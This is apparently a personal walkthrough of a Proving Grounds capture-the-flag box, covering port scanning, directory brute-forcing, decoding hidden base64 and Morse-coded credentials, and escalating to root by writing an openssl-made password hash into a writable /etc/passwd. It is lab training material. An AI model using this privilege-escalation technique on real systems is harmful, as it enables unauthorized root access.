This was fun but there’s a funky rabbit hole involving a QR code image that I’ll include just because it’s interesting and a good academic process
1. Scan to find 22 and 80 tcp open.
2. 22 is usually not fruitful so browse to http://[targetIP] to look around and we just see a jpg called vegeta1.jpg. Useless.
3. Dirbuster around to find http://targetIP/find_me/find_me.html
4. wget the html, then tail -1 to find a hidden base64 string.
5. Hop onto cyberchef and pasted the base64 into the box BUT, you must decode it with base64 twice to reveal a PNG that has a QR that scans to say password is topshellv.png but the pass isn’t useful but that was interesting.
6. Anyhow, use dirbuster to also find a dir with a wav file called hahahaha.wav. Listen to it. Sounds like morse code sooooo.
7. Upload the morse code file to decode it here and it will decode a username and password.
8. SSH with that and find /home/[username from morse code]/local.txt for the first flag.
9. Run linpeas.sh to find that /etc/passwd is writeable.
10. openssl passwd will spit out a hash. Put that into /etc/passwd under trunks between the 1st and 2nd : that has an X in it by default.
11. su with passwd then cat /root/proof.txt for the 2nd flag.
Main takeaways:
– If base64 doesn’t decode the first time, keep decoding it with more base64 or maybe other decoders to find the useful file.
– If you find an audio file with morse code, you can upload it to that site above and it will decode it for you. Wow!
– Scrub all parts of all files so we don’t miss the base64 at the bottom of find_me.html at the bottom, commented out.
– linpeas easily found writeable /etc/passwd and we can insert a password hash we made with openssl right into passwd then su with it. Weird but awesome.
Try a Proving Grounds box here.